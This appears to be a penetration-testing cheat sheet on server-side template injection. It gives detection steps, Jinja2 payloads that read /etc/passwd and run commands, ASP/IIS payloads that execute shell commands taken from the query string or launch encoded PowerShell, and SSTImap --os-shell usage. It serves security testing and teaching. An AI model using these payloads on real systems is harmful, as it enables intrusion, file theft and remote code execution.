SSTI: Server-Side Template Injection
Server-side template injection is a web application vulnerability that occurs in template-generated applications. User inputs get embedded dynamically into the template variables and rendered on the web pages.
Modern template engines are more complex and support various functionalities that allow developers to interact with the back-end directly from the template.
- Detection Steps
First, identify the application’s built-in language and the running template engine.
Then, identify injectable user-controlled inputs in GET and POST requests.
After that, fuzz the application with special characters ${{<%[%'"}}%\. Observe which ones get interpreted by the server and which ones raise errors.
Then we could try basic injection payloads in like {{7*7}}, if that returns 49, then it's vulnerable to SSTI.
- Injection in GET Requests
- Injection in POST Requests
- Payloads
To read files:
{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}
Short payloads for RCE:
{{ cycler.__init__.__globals__.os.popen('id').read() }}
{{ joiner.__init__.__globals__.os.popen('id').read() }}
{{ namespace.__init__.__globals__.os.popen('id').read() }}
ASP SSTI (IIS Server SSTI Payloads):
To test it (If we see 49 in the output, then its vulnerable):
<%response.write(7*7) %>
To get a revshell
<%response.write CreateObject("WScript.Shell").Exec("cmd /c whoami}").StdOut.Readall()%>
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>
or
@System.Diagnostics.Process.Start("cmd.exe","/c powershell -e {encoded command}");
- SSTImap
https://github.com/vladko312/SSTImap
./sstimap.py -u https://example.com/page?name=John
./sstimap.py -u https://example.com/page?name=John --os-shell
- Payloads
Generic
PHP
Python
Last updated